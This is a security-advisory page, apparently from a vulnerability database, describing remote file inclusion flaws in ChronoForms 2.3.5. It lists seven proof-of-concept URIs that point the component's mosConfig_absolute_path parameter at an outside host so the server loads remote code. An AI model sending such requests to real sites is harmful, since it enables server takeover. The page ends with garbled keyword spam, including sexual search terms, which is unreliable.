about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities


Title ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2008-01-30-12:00AM
Updated 2008-01-31-05:57PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Crackers_Child is credited with the discovery of these vulnerabilities.
Vulnerable  ChronoEngine ChronoForms 2.3.5
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http;//www.example2.com
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:13:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.bjyj20 www.ayuanj Www.18sexy www.jiafen 200 /compo www.990sf. Desi linux 2.4. JRE java Game Video skan WWW.S Sexfemme skins/adva ip board 2 mujeresfol 200 /compo Sex. news for c Crack Data news for c crack data www.jqbiz. video blue taomf.cn colombinas 200 /compo bit commet Securitydo artis boge mambo Remo animal sex Www.Kerala /usr/local www.shjind Crack Data Pamelaandr mirapoint www.8jzz.c news for c sexcy clip Visual Stu news for C tetris Hindi actr www.bigtit Www.film b phphtml.ph HP/www.biu www.sex.se